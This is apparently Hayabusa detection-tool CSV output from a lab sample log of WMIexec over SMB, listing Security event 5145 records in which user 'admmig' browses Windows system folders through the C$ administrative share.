2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom\Custom64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\en-US | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppReadiness | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
